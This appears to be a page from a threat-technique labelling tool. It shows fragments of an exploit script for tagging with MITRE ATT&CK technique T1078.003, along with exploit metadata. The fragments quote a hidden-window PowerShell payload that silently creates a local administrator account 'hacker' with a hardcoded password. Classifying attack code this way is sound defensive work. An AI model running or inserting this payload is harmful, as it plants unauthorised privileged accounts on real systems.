“et # payload : adds local administrator account " hacker " silently payload = ( ' powershell. exe - nop - w hidden - c " ' ' $ user = \ \ \ ' hacker \ \ \ ' ; ' ' $ pass = convertto - securestring \ \ \ ' p @ ssw0rd123! \ \ \ ' - asplaintext - force ; ' ' new - localuser - name $…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1078.003Local Accounts
72%
“: u / c : h / i : h / a : h # category : local # platform : windows # critical : this is a post - exploitation / living - off - the - land technique widely used in real attacks # including : zero - day at time of disclosure ( march 2025 ), actively exploited by water gamayun apt …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1078.003Local Accounts
50%
“: hacker " ) print ( " password : p @ ssw0rd123! " ) print ( " verify with : net localgroup administrators " ) if _ _ name _ _ = = " _ _ main _ _ " : main ( )”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.